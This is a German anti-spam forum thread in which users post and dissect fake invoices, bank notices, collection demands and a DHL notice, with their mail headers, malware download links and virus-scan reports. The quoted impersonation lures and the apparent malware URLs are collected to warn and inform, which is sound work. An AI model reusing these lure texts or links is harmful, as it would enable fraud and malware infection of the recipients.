Wieder dieselbe Bande, Volksbank:

Received: from mail-relay3.slovanet.net ([195.28.64.97]) by mx-ha.gmx.net (mxgmx010) with ESMTP (Nemesis) ID: [ID filtered]
Received: from mail-relay3.slovanet.net (localhost [127.0.0.1]) by mail-relay3.slovanet.net (Postfix) with ESMTP ID: [ID filtered]
Received: from mailhub3.slovanet.net (mailhub1.slovanet.net [195.28.64.118]) by mail-relay3.slovanet.net (Postfix) with ESMTP ID: [ID filtered]
Received: from localhost (unknown [87.69.88.171]) (Authenticated sender: diann) by mailhub3.slovanet.net (Postfix) with ESMTPA ID: [ID filtered]

gecrackt: diann [at] mailhub1.slovanet.net


LogoVolksbank Online

Der Auftrag wurde entgegengenommen.
18. November 2014 um xx:xx:xx Uhr

Sie haben eine Zahlung über *1617,36 EUR* an *Aurel Bacioiu* veranlasst.
Wir haben die Volksbank benachrichtigt, dass der Artikel verschickt
werden kann.
Alle Details zu dieser Zahlung:
2014details_transaktion_2241.zip

http://thoitrangnamgiasi.com/wgQRd21OF

IP: 112.213.89.2 ---> ns8902.dotvndns.vn

Download: volksbank_de_transaktions_id_000023928001_2014_11.zip

https://www.virustotal.com/de/file/7194a2432bc2c5dde9459f741101a5bab8c2705d5765a5d0fe702b814824aa57/analysis/

Analyse: https://anubis.iseclab.org/?action=result&task_id=13368fe8351687a8491b32bf6a66dba26&format=html

kjz1
18.11.2014, 14:45
Von diesen Ganoven natürlich immer im Doppelpack:

eceived: from fliedner-server.touch.de (fliedner-server.touch.de
[5.9.208.243])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Tue, 18 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost (215-21.76-83.cust.bluewin.ch [83.76.21.215])
by fliedner-server.touch.de (Postfix) with ESMTPA ID: [ID filtered]
for xxxxx; Tue, 18 Nov 2014 xx:xx:xx +0100 (CET)

gecrackt: langen [at] brandenburg.fliedner.de



LogoGroup Data Protection Officer Fiducia aG

Der Auftrag wurde entgegengenommen.
18. November 2014, xx:xx:xx Uhr

Sie haben eine Zahlung über *1944,74 EUR* an *MR KAMIL ZIOLKOWSKI*
überwiesen.
Wir haben die Volksbank über die Versandbereitschaft des Artikels in
Kenntnis
gesetzt. Weitere Details zu diesem Vorgang:
2014details_transaktion_3259.zip
http://beverlyhillsbreastsurgeonca.com/lbGPzwxdVY

IP: 50.28.14.198 ---> host.websitedesignlosangeles.com/liquidweb.com

Download: volksbank_de_transaktions_id_000023928001_2014_11.zip

DJANGO
18.11.2014, 17:52
.....und wieder mal eine "Vodafone"-Rechnung, natürlich auf dem gmx-Account:

rechnungonline [at] vodafone.de
Sehr geehrte Damen und Herren,

anbei erhalten Sie Ihre Rechnung vom 18.11.2014.

2014_11Rechnung_Kundennr_899740000577589974.pdf

Der Rechnungsbetrag in Höhe von 374,32 EUR wird am 28.11.2014 von Ihrem Konto abgebucht.

Ihre Rechnung ist im PDF-Format erstellt worden. Um sich Ihre Rechnung anschauen zu können, klicken Sie auf den Anhang und es öffnet sich automatisch der Acrobat Reader.


Freundliche Grüße
Ihr Vodafone D2
Return-Path: anmeldung [at] dasmediabc.de
Received: from mout-xforward.kundenserver.de ([82.165.159.5]) by mx-ha.gmx.net (mxgmx003) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost (vienna.alda.at [83.65.88.226]) by mrelayeu.kundenserver.de (node=mreue002) with ESMTP (Nemesis) ID: [ID filtered]
Subject: Ihre Festnetz-Rechnung f��r November 2014
From: "rechnungonline [at] vodafone.de"<anmeldung [at] dasmediabc.de>
To: ***@gmx.de
X-Mailer: iPad Mail (12A405)
X-Copyright: Microsoft Windows Live Mail 15.4.3538.513
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Tue, 18 Nov 2014 xx:xx:xx +0100

kjz1
18.11.2014, 20:19
Dies dürfte dieselbe Bande sein, gecrackt hat man: anmeldung [at] dasmediabc.de

Mittwoch
19.11.2014, 17:03
Jetzt gibt es auch gefälschte Rechnungen für De-Mails:


Betreff: 1&1 De-Mail - Ihre Rechnung 426543000445739 vom 19.11.2014
Sehr geehrte Damen und Herren,

heute erhalten Sie Ihre Rechnung vom 19.11.2014. Sie finden diese im Anhang als PDF-Datei.

Ihre Rechnung für November 2014 -> http://midiaquatorze.com/SDZgnjFyY

Den Betrag von 332,11 EUR buchen wir am 27.11.2014 von Ihrem Konto ab.

Ich wünsche Ihnen weiterhin viel Freude mit den Leistungen von 1&1.

Mit freundlichen Grüßen


Ihr

A*** H***,
Leiter Kundenkommunikation 1&1 Telecom GmbH

Return-Path: m***@kuligtravel.pl
Received: from v085285.home.net.pl ([79.96.135.195]) by mx.kundenserver.de
(mxeue104) with ESMTP (Nemesis) ID: [ID filtered]
<blah [at] blub.tld>; Wed, 19 Nov 2014 xx:xx:xx +0100
Received: from 88.85.106.170.neotel.mk [88.85.106.170] (HELO localhost)
by kuligtravel.home.pl [79.96.135.195] with SMTP (IdeaSmtpServer v0.80)
ID: [ID filtered]
Subject: 1&1 De-Mail - Ihre Rechnung 426543000445739 vom 19.11.2014
From: "1&1 De-Mail GmbH"<m***@kuligtravel.pl>
http://midiaquatorze.com/SDZgnjFyY leitet weiter nach http://midiaquatorze.com/SDZgnjFyY/1&1_2014_11rechnung_onlinerechnung.zip

Ich spare mir den Gang zum Virenscanner. Dürfte obligatorisch sein, zumal die Mail überhaupt nicht via DE-Mail einging.

Schönen Gruß
Mittwoch

schara56
21.11.2014, 07:12
Meine 1+1 "Kundenrechnung" ist da:
Received: from mout-xforward.kundenserver.de ([82.165.159.36]) by
mx-ha.gmx.net (mxgmx008) with ESMTPS (Nemesis) ID: [ID filtered]
for <x>; Fri, 21 Nov 2014 xx:xx:xx +0100
Received: from localhost (91-113-86-148.adsl.highway.telekom.at [91.113.86.148])
by mrelayeu.kundenserver.de (node=mreue103) with ESMTP (Nemesis)
ID: [ID filtered]
http://ludana.sk/Uh7wAILMl (217.67.31.35)
Received: from mout-xforward.kundenserver.de ([82.165.159.8]) by mx-ha.gmx.net
(mxgmx005) with ESMTPS (Nemesis) ID: [ID filtered]
<x>; Fri, 21 Nov 2014 xx:xx:xx +0100
Received: from localhost (ip-88-207-201-127.static.luxdsl.pt.lu [88.207.201.127])
by mrelayeu.kundenserver.de (node=mreue003) with ESMTP (Nemesis)
ID: [ID filtered]
http://sviportali.com.hr/owl40Vj1 (195.78.33.120)

Siehe dazu virustotal.com (https://www.virustotal.com/de/file/e0956c29958b07801250cdf23e2a6e098fd9ad024447dcfb2572a723b25108d6/analysis/) und Jotti.org (http://virusscan.jotti.org/de/scanresult/95c4aec2f334b47221683f5ae8781d624bf8e040).

kjz1
21.11.2014, 11:40
Wieder dieselbe Bande:

Received: from mo4-p03-ob.smtp.rzone.de ([81.169.146.173]) by mx-ha.gmx.net (mxgmx007) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost ([188.20.100.74]) by smtp.strato.de (RZmta 35.13 AUTH) with ESMTPA ID: [ID filtered]

IP: 188.20.100.74 ---> FOQUSMANAGEM-HWY-AT

gecrackt: gruppe10 [at] salvator-kolleg.de


TELEKOM - ERLEBEN, WAS VERBINDET.
Ihre Rechnung für November 2014

Lieber Telekom Kunde,
hiermit informieren wir Sie über Ihre aktuelle Rechnung. Die fällige
Summe für
November 2014 beträgt insgesamt: *123,36 Euro*.

Im Anhang finden Sie die gewünschten Dokumente zu Ihrer Mobilfunk
RechnungOnline
für November 2014. Rechnung_2014_11_84741376_V_15223311_N_4_9567.pdf

http://madcapcottage.com/1yetFA4RZB

Diese Nachricht wurde automatisch erzeugt. Bitte antworten Sie nicht an den
Absender.
Mit freundlichen Grüßen

***
Leiter Kundenservice
© Telekom Deutschland GmbH 2014

IP: 65.254.248.145 ---> 65-254-248-145.yourhostingaccount.com

deekay
21.11.2014, 11:41
Oh das Salvator Kolleg kenne ich....ist gleich in der Nähe hier

schara56
25.11.2014, 19:43
Received: from rapidwaters.co.uk ([176.56.193.152]) by mx-ha.gmx.net
(mxgmx104) with ESMTP (Nemesis) ID: [ID filtered]
<x>; Tue, 25 Nov 2014 xx:xx:xx +0100
Received: from localhost (unverified [81.21.125.66])
by rapidwaters.co.uk (SurgeMail 3.6f5) with ESMTP ID: [ID filtered]
for <x>; Tue, 25 Nov 2014 xx:xx:xx +0000
http://shiki49.com/wp-admin/5SC39LW0v1V*schnipp*

Ergebnisse der Scanner:
Jotti.org (http://virusscan.jotti.org/de/scanresult/c8f502934ae880656c36fca57b575ae792b3ecb9)
virustotal.com (https://www.virustotal.com/de/file/d10395057b258ee0d05c6dcc5531f2706961f1f082ed678a6711c94634c5a339/analysis/1416940773/)

DJANGO
26.11.2014, 11:08
Kommt wohl aus Muränien und kam nicht in den Spamordner:

NTTCable Gruppe
sales1 [at] premierpalace.ro

Ihre Kundennummer: 412124
Sehr geehrter Geschäftspartner,

anbei erhalten Sie die NTTCable-Telefonrechnung für den Leistungsmonat November 2014,
Telefonrechnung NTTCable November 2014.

Hinweise zum Format und der digitalen Signatur:
Ihre Rechnung ist im PDF-Format erstellt und mit einer digitalen Signatur versehen.
Somit erfüllt Ihre Rechnung alle Anforderungen des Signaturgesetzes.
Haben Sie Fragen zu Ihrer Rechnung?
Dann rufen Sie uns an. Unser Customer-Care-Team steht Ihnen telefonisch jederzeit gerne zur Verfügung.

Mit freundlichen Grüßen
Ihre Telefongesellschaft
______________________________________________
NTTCable Gruppe
Telefongesellschaft der Deutschen Industrie.

Escher Str. 19
D - 65510 Idstein
Tel: +49 0 6126 - 9 98 76 - 0
Fax:+49 0 6126 - 9 98 76 - 54
EMail: info [at] nttcable.de
Web: www.nttcable.de

NTTCable Europe S.A.
Registriert in Luxemburg Handelsregisternummer: B 160348
NTTCable Deutschland KG
Geschäftsführender Gesellschafter: ***
Registriert in Wiesbaden HRA 9407
NTTCable Service KG
Geschäftsführender Gesellschafter: ***
Registriert in Wiesbaden HRA 9404
Return-Path: sales1 [at] premierpalace.ro
Received: from vps046.whmpanels.com ([89.42.219.10]) by mx-ha.gmx.net (mxgmx004) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from 146-165-85-95.dynamic.stcable.net ([95.85.165.146]:45858 helo=localhost) by vps046.whmpanels.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256) (Exim 4.82) (envelope-from <poor [at] spamvictim.tld>) ID: [ID filtered]
Subject: Telefonrechnung NTTCable November 2014
From: "NTTCable Gruppe"<sales1 [at] premierpalace.ro>
To: ***@gmx.de
X-Mailer: Print Manager v1.10.157.18025
X-Copyright: MIME-tools 5.502 (Entity 5.502)
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - vps046.whmpanels.com
X-AntiAbuse: Original Domain - gmx.de
X-AntiAbuse: Originator/Caller UID/GID: [UID filtered]
X-AntiAbuse: Sender Address Domain - premierpalace.ro
X-Get-Message-Sender-Via: vps046.whmpanels.com: authenticated_ID: [ID filtered]
X-Source:
X-Source-Args:
X-Source-Dir:
Envelope-To: <***@gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;

Mittwoch
26.11.2014, 16:13
Aus gegebenem Anlass weise ich nachdrücklich auf das in den Forenregeln enthaltene Klarnamenverbot hin. Gerade hier, wo die Täter schon beinahe Identitätsklau betreiben, sollte genau deswegen verstärkt darauf geachtet werden. Vielen Dank!

Mit schönen Grüßen
Mittwoch

kjz1
01.12.2014, 11:32
Eine neue(?) Variante:

Received: from klems-medien.de (klems-medien.de [46.4.118.61])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Mon, 1 Dec 2014 xx:xx:xx +0100 (CET)
Received: (qmail 10253 invoked from network); 1 Dec 2014 xx:xx:xx +0100
Received: from 113-46.206-83.static-ip.oleane.fr (HELO localhost)
(83.206.46.113)
by klems-medien.de with ESMTPA; 1 Dec 2014 xx:xx:xx +0100


Guten Tag *'Mein Name'*,

bitte beachten Sie, dass Sie sich Ihre Rechnung selbst ausdrucken können.

Ihre gewählte Zahlungsmethode, Kontodaten sowie Zahlungsziel finden Sie
auf der
Rechnung.

Rechnung http://xn--b1aexqd4b.xn--p1ai/media/UKAPaD

Sollten Sie Ihre Rechnung per Überweisung zahlen, bitte als
Zahlungsgrund Ihre
Rechnungsnummer angeben. Nach Eingang der Zahlung bekommen Sie eine
Zahlungsbestätigung per Email.

IP: 176.57.210.40 ---> species.timeweb.ru

zum Download: de_rechnung.zip

Analyse: https://www.virustotal.com/de/file/8f81f637ef6c13cd6c6738835bf20d94e362f8f8bacf73fd886dde326b0df430/analysis/1417425627/

kjz1
05.12.2014, 11:26
Das passt wieder ins Schema:

Received: from BLU004-OMC2S10.hotmail.com (blu004-omc2s10.hotmail.com
[65.55.111.85])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Fri, 5 Dec 2014 xx:xx:xx +0100 (CET)
Received: from BLU436-SMTP8 ([65.55.111.73]) by
BLU004-OMC2S10.hotmail.com over TLS secured channel with Microsoft
SMTPSVC(7.5.7601.22751); Thu, 4 Dec 2014 xx:xx:xx -0800

gecrackt: X-Originating-Email: mont1957 [at] outlook.de


Guten Tag 'Mein Name',


heute erhalten Sie Ihre Rechnung vom 04.12.2014. Sie finden diese im
Anhang als
PDF-Datei.

Der Rechnungsbetrag in Höhe von *288,68 EUR* wird am 04.12.2014 von
Ihrem Konto
abgebucht.

Telefonrechnung Telekom http://tax-q.co.za/wp-admin/t9Vy2W.
('Mein Name')


Mit freundlichen Grüßen,
Telekom Leiter Kundenservice

'Mein Name' verwende ich in dieser Form erst seit kurzem, da wurden also Adressen recht frisch abgeerntet.

IP: 85.10.213.46 ---> www110.nur4.host-h.net/Hetzner

Also mal wieder ein gecracktes Wordpress bei Hetzner...

Download: telekom_deutschland_dezember_2014.zip

Report: https://www.virustotal.com/de/file/59969aac99f42d22ea4fba144df1c1c73a06c4f42f6535a90d0ddfe1133c1031/analysis/

SpamKampf
03.01.2015, 10:33
Na ja, mein Konto soll nicht ausreichend gedeckt gewesen sein und jetzt kommt eine Firma mit Namen „Inkasso Heinrich Dominic“ auf mich zu und will das Geld einfordern. :greedy_dollars: Wie hoch der offene Betrag sein soll und auf welches Konto der Betrag zu überweisen ist, kann ich erst mit dem Öffnen einer .zip Datei erfahren. :devilish: Oh … eine .zip Datei. Die mach ich lieber nicht auf. Das könnte ansonsten so ausgehen: :bomb:


Return-Path: <krusso [at] mat.unical.it>
Received: from ml.mat.unical.it (ml.mat.unical.it [160.97.62.2])
by mtaig-mbb04.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <**************@********.net>; Sat, 3 Jan 2015 xx:xx:xx -0500 (EST)
Received: from localhost (ml [127.0.0.1])
by ml.mat.unical.it (Postfix) with ESMTP ID: [ID filtered]
for <**************@********.net>; Sat, 3 Jan 2015 xx:xx:xx +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at mat.unical.it
Received: from ml.mat.unical.it ([127.0.0.1])
by localhost (ml.mat.unical.it [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP ID: [ID filtered]
Sat, 3 Jan 2015 xx:xx:xx +0100 (CET)
Received: from FISCHER-BUCHHAL (HSI-KBW-37-209-36-234.hsi15.kabel-badenwuerttemberg.de [37.209.36.234])
(Authenticated sender: poor [at] spamvictim.tld #myserver)
by ml.mat.unical.it (Postfix) with ESMTPSA ID: [ID filtered]
for <**************@********.net>; Sat, 3 Jan 2015 xx:xx:xx +0100 (CET)
From: "Inkasso Mail & Media AG" <krusso [at] mat.unical.it>
To: "**************" <**************@********.net>
Subject: Rechnung 40144126 vom 03.01.2015
Date: Sat, 3 Jan 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0055_29B93EF6.79EB63BB"
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5600.1067/98281
X-AOL-VSS-CODE: clean
Authentication-Results: mx.aol.com;
spf=pass (aol.com: the domain mat.unical.it reports 160.97.62.2 as a permitted sender.) smtp.mailfrom=mat.unical.it;
x-aol-sID: [ID filtered]
X-AOL-IP: 160.97.62.2
X-AOL-SPF: domain : mat.unical.it SPF : pass

------=_NextPart_000_0055_29B93EF6.79EB63BB
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable



------=_NextPart_000_0055_29B93EF6.79EB63BB
Content-Type: application/octet-stream;
name="Forderung 03.01.2015 - Inkasso Mail & Media AG.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Forderung 03.01.2015 - Inkasso Mail & Media AG.zip"



Sehr geehrter Kunde,

das von Ihnen gespeicherte Bankkonto wurde im Moment der Abbuchung nicht
genügend gedeckt um die Lastschrift auszuführen. Sie haben eine ungedeckte
Forderung bei der Firma Mail & Media AG. Namens unseren Mandanten ordnen wir
Ihnen an, die noch offene Gesamtforderung unverzüglich zu begleichen.

Aufgrund des andauernden Zahlungsverzug sind Sie gebunden außerdem, die durch
unsere Tätigkeit entstandenen Gebühren von 50,62 Euro zu bezahlen. Wir erwarten
die Überweisung inbegriffen der Gebühren bis spätestens 08.01.2015 auf unser
Bankkonto.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der Frist
wird die Angelegenheit dem Staatsanwalt und der Schufa übergeben. Eine
vollständige Forderungsausstellung, der Sie alle Einzelpositionen entnehmen
können, fügen wir bei. Für Fragen oder Anregungen erwarten wir eine
Kontaktaufnahme innerhalb des selben Zeitraums.

Mit freundlichen Grüßen

Inkasso Heinrich Dominic



Gruß von SpamKampf

isenaecher
26.01.2015, 21:55
Heute hier aufgeschlagen
Return-Path: mz-zw [at] gmx.de
Received: from mout.gmx.net ([212.227.15.15]) by mx-ha.gmx.net (mxgmx110) with
ESMTPS (Nemesis) ID: [ID filtered]
Jan 2015 xx:xx:xx +0100
Received: from Neu ([87.234.53.98]) by mail.gmx.com (mrgmx001) with ESMTPSA
(Nemesis) ID: [ID filtered]
xx:xx:xx +0100
From: "Inkasso Abteilung Directpay GmbH" <mz-zw [at] gmx.de>
To: "Isenächer" <ich-armes poor [at] spamvictim.tld>
Subject: Kontoabbuchung Nr. 34834200 konnte nicht vorgenommen werden 26.01.2015
Date: Mon, 26 Jan 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0033_910DF5B0.8D2AAD09"
X-Provags-ID: [ID filtered]
Q57+ZRdiOtJTtE3pVo/DFsl7oabR5avgJri4uadEyJTw46VQrXS+7jmJ6HyH+4GScdWtqG/
8WBy5E+WTO4LwY5QP//f9KnT+iNTNu7N7s/L4p3ycQYpM6QklVZk/JMe5xXHO7i0Ymjjq4Q
KVnrIjzqFc0rwewThWLaQ==
X-UI-Out-Filterresults: notjunk:1;
Envelope-To: <ich-armes poor [at] spamvictim.tld>


Guten Tag Isenächer,

Ihr Kreditinstitut hat die Lastschrift zur=C3=BCck gebucht. Sie haben eine =
offene Forderung bei Directpay GmbH.=20

Aufgrund des bestehenden Zahlungsr=C3=BCckstands sind Sie verpflichtet zus=
=C3=A4tzlich, die durch unsere Inanspruchnahme entstandenen Geb=C3=BChren v=
on 44,10 Euro zu tragen. Wir erwarten die vollst=C3=A4ndige Zahlung zuz=C3=
=BCglich der Mahnkosten bis zum 29.01.2015 auf unser Konto.=20

Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Angelegenh=
eit dem Gericht und der Schufa =C3=BCbergeben. Die detaillierte Kostenaufst=
ellung, der Sie alle Buchungen entnehmen k=C3=B6nnen, f=C3=BCgen wir bei. F=
=C3=BCr R=C3=BCckfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme=
innerhalb des gleichen Zeitraums.=20

Namens und in Vollmacht unseren Mandanten ordnen wir Ihnen an, die offene F=
orderung schnellstens zu begleichen.=20

Mit freundlichen Gr=C3=BC=C3=9Fen


Inkasso Abteilung Bebel Joshua


Die Spamprosa hat wahrscheinlich verhindert, dass die Mail gefiltert wurde.
Jetzt habe ich aber Angst. Und ich frage mich, was ich jetzt mache?:scared:

87.234.53.98
212.227.15.15

Die Absenderadressen sind verdächtig. Wahrscheinlich ist der Rechner Teil eines Bootnetzes.

Die angehängte Zip habe ich lieber nicht aufgemacht:cool:

winnifred
10.02.2015, 11:22
Return-Path: x [at] x.x
Received: from mout.web.de ([212.227.17.12]) by mx-ha.web.de (mxweb109) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from buero_pc16 ([62.96.101.43]) by smtp.web.de (mrweb101) with ESMTPSA (Nemesis) ID: [ID filtered]
From: "Onlinetv Recorder Plattform AG" <x [at] x.x>
To: "" <xxx [at] xxx>
Subject: Onlinetv Recorder Plattform AG Rechnung vom 10.02.2015
Date: Tue, 10 Feb 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="X"
X-Provags-ID: [ID filtered]
X-UI-Out-Filterresults: notjunk:1;
Envelope-To: <xxx [at] xxx>
X-UI-Filterresults: X

----------------

Text:

Sehr geehrter Kunde,

wir begrüßen Sie als neuen Kunden und bedanken uns bei Ihnen für Ihr Vertrauen.

Durch die Bestätigung der Abo-AGBs von Onlinetv Recorder Plattform AG haben Sie rechtskräftig einen Vertrag mit uns abgeschlossen.

Wir bitten um Zahlung des Rechnungsbetrages innerhalb von 14 Tagen an die im Vertrag genannte Bankverbindung. Im beigefügtem Schreiben finden Sie nochmal die Zahlungsaufforderung mit unseren Bankdaten. Wenn Ihnen unsere Dienstleistung nicht gefällt, können Sie bequem innerhalb von einem Monat mit Hilfe des beigefügten Dokuments den Vertrag kündigen

Die 30 tägige Rechnung beträgt 69,90 Euro. Die Laufzeit Ihres Vertrags beträgt 24 Monate und kann nur immer zum Monatsende storniert werden.
Falls Sie die Zahlung weigern, müssen Sie mit sehr erheblichen Kosten rechnen.

Wir wünschen Ihnen auch in Zukunft beste Unterhaltung auf unserer Plattform.

Mit freundlichen Grüßen.

Onlinetv Recorder Plattform AG und Letspay Office GmbH Adrian Weiß

-----------------------------

Im Anhang befindet sich eine ZIP-Datei namens "Onlinetv Recorder Plattform AG Rechnung vom 10.02.2015.zip".

Ich glaube, ich habe mich tatsächlich mal irgendwann bei save.tv registriert - wahrscheinlich wurden die gehackt, nehme ich an.

----

Nachtrag: Eine Firma, geschweige denn eine AG, mit diesem Namen gibt es nicht. Überraschung.

deekay
10.02.2015, 11:24
wahrscheinlich wurden die gehackt, nehme ich an.

Muss nicht sein. Die Spammer schicken an jede Adresse die sie bekommen können diesen Dreck mit dem Zip Anhang. Ich gehe davon aus, du hast den Anhang nicht geöffnet....

winnifred
10.02.2015, 11:31
Ääh ... nein :)

Jogy4711
11.02.2015, 09:26
Identisch Mail gestern hier auch aufgeschlagen.
Die Seite war mir bisher völlig unbekannt.

Die Onlinetv Recorder Plattform AG versucht wohl die nicht vorhandenen Außenstände mit Hilfe eines Viren verseuchten Anhangs eintreiben. :mad:

kjz1
11.02.2015, 09:49
Die Onlinetv Recorder Plattform AG versucht wohl die nicht vorhandenen Außenstände mit Hilfe eines Viren verseuchten Anhangs eintreiben. :mad:

Die stecken da zwar wohl nicht dahinter, aber Onlinetv Recorder ist schon ein seltsames Konstrukt: die Domain ist auf den Seychellen registriert, die Server stehen in Tschechien und die Zahlungen gehen an die TCU AG in Deutschland. Die TCU AG (Fernseh-Fee) betreibt hier um die Ecke im Souterrain eines Wohnhauses ein kleines Büro.

truelife
11.02.2015, 11:45
Natürlich wurde OnlineTVRecorder hier nur als Namen missbraucht. Ansonsten taugt deren Service schon, so eine Aufnahmesoftware ist mitunter sehr praktisch. Der Auslandssitz hat AFAIK rechtliche Gründe.

kjz1
17.02.2015, 09:04
Eine weitere Variante:

Received: from club213-PC ([82.83.140.153]) by mail.gmx.com (mrgmx103) with
ESMTPSA (Nemesis) ID: [ID filtered]
2015 xx:xx:xx +0100


Sehr geehrter Kunde [mein Name],

das von Ihnen vorliegende Konto ist nicht genügend gedeckt um die
Lastschrift auszuführen. Sie haben eine nicht gedeckte Forderung beim
Unternehmen Mail & Media GmbH.

Aufgrund des andauernden Zahlungsrückstands sind Sie gezwungen
zuzüglich, die durch unsere Tätigkeit entstandenen Gebühren von 26,17
Euro zu bezahlen. Wir erwarten die vollständige Zahlung bis zum
2002.2015 auf unser Bankkonto.

Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Akte
dem Gericht und der Schufa übergeben. Die detaillierte
Forderungsausstellung, der Sie alle Positionen entnehmen können, fügen
wir bei. Für Rückfragen oder Unklarheiten erwarten wir eine
Kontaktaufnahme innerhalb des selben Zeitraums.

In Vollmacht unseren Mandanten ordnen wir Ihnen an, die noch offene
Gesamtforderung sofort zu begleichen.

Mit freundlichen Grüßen

Rechnungsstelle Schäufelein Sebastian

Im Anhang ein Zip-Archiv, wob bei Jotti momentan nur 10 von 22 Virenscannern anschlagen.

SpamKampf
04.03.2015, 10:56
Eine weitere Variante die bei mir eingetroffen ist: :eek:

Return-Path: <marioszka980 [at] wp.pl>
Received: from mx3.wp.pl (mx3.wp.pl [212.77.101.10])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by mtaig-mba03.mx.aol.com (Internet Inbound) with ESMTPS ID: [ID filtered]
for <**************@********.net>; Tue, 3 Mar 2015 xx:xx:xx -0500 (EST)
Received: (wp-smtpd smtp.wp.pl 3462 invoked from network); 3 Mar 2015 xx:xx:xx +0100
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a;
t=1425369359; bh=kIMTRs7qJZ1LwPe5vpo3QGStjeBa+h4jjzHwwR1f+F8=;
h=From:To:Subject;
b=M6p6ydTbnJW5UtJiYy+eKJj5D2thTXxuuSHwZJI+1478Zj8goBUbT611Mk2pgKMxV
5TqPnKpLDx6PVZfHTNdNpWWZXGJODJ/mvDDF5z+MxSQvmJSsXZSW7y1yGplqExFlIp
jHPuXjqiTkyU05deaqpsXof/L99coFh4R7Ex1LJ8=
Received: from d536332c.access.ecotel.net (HELO Stefan-PC) (marioszka980@[213.54.51.44])
(envelope-sender <poor [at] spamvictim.tld>)
by smtp.wp.pl (WP-SMTPD) with ECDHE-RSA-AES256-SHA encrypted SMTP
for <**************@********.net>; 3 Mar 2015 xx:xx:xx +0100
From: "Stellvertretender Sachbearbeiter Mail & Media GmbH" <marioszka980 [at] wp.pl>
To: "**************" <**************@********.net>
Subject: Ihr angegebenes Konto ist nicht ausreichend gedeckt
Date: Tue, 3 Mar 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00C9_4927A498.791007FD"
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO 0000000 [wbP0]
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5600.1067/98281
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-AUTHENTICATION: mtaig-mba03.mx.aol.com ; domain : wp.pl DKIM : pass
Authentication-Results: mx.aol.com;
spf=pass (aol.com: the domain wp.pl reports 212.77.101.10 as a permitted sender.) smtp.mailfrom=wp.pl;
dkim=pass (aol.com: email passed verification from the domain wp.pl.) header.d=wp.pl;
x-aol-sID: [ID filtered]
X-AOL-IP: 212.77.101.10
X-AOL-SPF: domain : wp.pl SPF : pass

------=_NextPart_000_00C9_4927A498.791007FD
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable



Sehr geehrter Kunde,

Ihr Kreditinstitut hat die Lastschrift zurück buchen
lassen. Sie haben eine nicht gedeckte Rechnung beim Unternehmen Mail & Media
GmbH.

Namens und in Vollmacht unseren Mandanten ordnen wir Ihnen an, die
offene Gesamtforderung sofort zu begleichen.

Aufgrund des bestehenden
Zahlungsausstands sind Sie verpflichtet dabei, die durch unsere Beauftragung
entstandenen Kosten von 38,31 Euro zu tragen. Wir erwarten die vollständige
Zahlung inbegriffen der Mahnkosten bis zum 06.03.2015 auf unser Konto.

Es
erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Akte dem Gericht
und der Schufa übergeben. Die detaillierte Kostenaufstellung, der Sie alle
Einzelpositionen entnehmen können, ist beigefügt. Für Fragen oder Reklamationen
erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

Mit
verbindlichen Grüßen

Stellvertretender Sachbearbeiter Kölderer Tobias


Gruß von SpamKampf

kjz1
04.03.2015, 12:17
Und noch eine:

Received: from mout-xforward.kundenserver.de ([82.165.159.36]) by
mx-ha.gmx.net (mxgmx106) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost ([78.131.144.66]) by mrelayeu.kundenserver.de (mreue103) with ESMTPSA (Nemesis) ID: [ID filtered]

78-131-144-66.tktelekom.pl


Sehr geehrter Kunde,

Die Sendung zur Bestellung 97323643723372972364
http://www.teamspeakclub.com/nolp_dhl_de ist nun intern bei DHL
erfaßt. Die
Auslieferung ist voraussichtlich für den *04.03.2015* geplant.

Über die nachfolgende Verlinkung werden weitere Informationen zu Ihrer
Sendung
ausgegeben: 97323643723372972364 http://www.teamspeakclub.com/nolp_dhl_de.

Mit freundlichen Grüßen,
Ihr Logistik-Team

